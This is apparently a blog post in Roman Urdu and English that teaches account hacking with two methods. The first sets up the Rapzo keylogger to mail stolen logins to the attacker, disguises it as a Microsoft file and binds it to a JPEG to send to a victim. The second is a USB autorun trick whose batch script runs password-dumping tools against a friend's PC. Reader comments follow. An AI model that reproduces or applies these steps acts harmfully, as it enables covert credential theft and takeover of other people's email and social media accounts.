How To hack any Account FB,Gmail,Twitter etc With keylogger Urdu Tutorial

Rapzo Keylogger, Hack any email with this keylogger Rapzo keylogger 1.5 public Edition full Tutorial

ye 5 things ki ap ko zruret hu gi
  1. Rapzo Keylogger
  2. Resource Hacker
  3. winrar (or any compressing tool)
  4. Microsoft net frame work
  5. A Hosting account (for share this file)
 Now Learn Tutorial
1. sab se pehle   Download Rapzo keylogger and Resource Hacker
2. Note pehle  Microsoft Netframe work, install kere apne pc me,
Keylogger Setting or how to use keylogger
3.ab ap KEylogger rar k files apne pc me Extract kr len, or Rapzo.exe file open kren, or us k bad Option me jaa kr wo sb things select kren ju nichey Image me hen

or jab ap Stealers pr Click kren ge tu ek new box open hu ga, waha pr Enable all ko Check kr den

tu ab ao MAin Setup me aye or Enable pr tick kr k bad username me apni gmail ka id or apna password correct enter keren, or logs send to box me bhi apna gmail ka id.

Guyz ab ap Test me per click keren ap ka agr username or password thik hu ga tu ap ko essa box open hu jaye ga agr failed hua tu apna gmail id or password check kerna,
or phir ap Build Server per click kr den.

7.Build server per click kerne k bad ek file same directory me bn jaye gi server file ye file us ko bhejni he jis kaa id ap ne hack kerna he

Now run the resource Hacker
Resource Hacker ko open keren or apni wo Server file es me opern ker len

 jb ap open ker len tu click on version info then click on 1 then click on "0" there you can see file description is Hijackthisfile reaplace it with Microsoft 

bad me click keren complete Script pe and save it as anyname.jpg

Thats it now you can bind it with any jepg image file with easy binder and upload it any hosting site like and share with your victim when he/she will run then you can hack it.

How to HAck Friends with Usb, ( Friends k pc ko Usb Flash Drive se hack keren) By Hex Hacker

 How to steal passwords with a USB in just seconds 

dosto es tutorial ma me ap ko ye btao ga k ap apne dosto ka computer USB Flash Drive se kese hack kr sktey hu?

step by Step learn ker len and enjoy

step 1: apne desktop pr ek new Notepad bnaye

nichey Red colour me diya gya text copy kr k us new text Document me paste kr len

ACTION= Play Game

or file me jaa kr Save as per Click kren or ye name typer keren AUTORUN.inf

How to make Autorun.inf file (agr ap ko autorun.inf file bnani nahi ati tu yaha pr click kren or sikh len)

step2: ab ek or new Notepad ya text document open keren

or nichey Red Colour me diya gya Text Copy kr len

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt

or es ko es name se save kr len or es file se bhi LAUNCH.bat

ab ap k pass 2 files hen 

step3: en dono ko apni Usb me copy kr len

step4: go to
or wo sb programs download ker len ju ap ne step 2 me text document me copy kiya tha,

step5: ab en files ko extract kr len or Usb me copy ker den, bss itna hi kaam tha,,,:)

step6: ab Usb remove kr k insert keren i mean dubar pc me lgaye

step7: click on the option " Play Game"
(this is an exemple, if you want it to say something else go to the autorun file and change it ;) )

step8: ab ap apni Usb Drive ko open ker k dekh sktey hen kuch txt files hun gi un ko open keren or waha usernames and passwords hun ge...:)
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July 22, 2015 at 6:13 AM delete

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September 4, 2016 at 9:58 PM delete

asalamoalaikum friends kisi ne mere name ki FAQ account Facebook p bnai hoi hy agar kisi dost ko pta ho k fb account p usne Jo pics share ki hoi hn WO kese delete hn gi to Brahe mehrbani WO pics delete kra do plz koi ehsaan kro mere p

September 4, 2016 at 9:58 PM delete

asalamoalaikum friends kisi ne mere name ki FAQ account Facebook p bnai hoi hy agar kisi dost ko pta ho k fb account p usne Jo pics share ki hoi hn WO kese delete hn gi to Brahe mehrbani WO pics delete kra do plz koi ehsaan kro mere p

May 15, 2018 at 1:26 PM delete

as of now 2018 this is only the keylogger with serial complete instuctions that works smooth with me without any problem or error
note without any survey or ads


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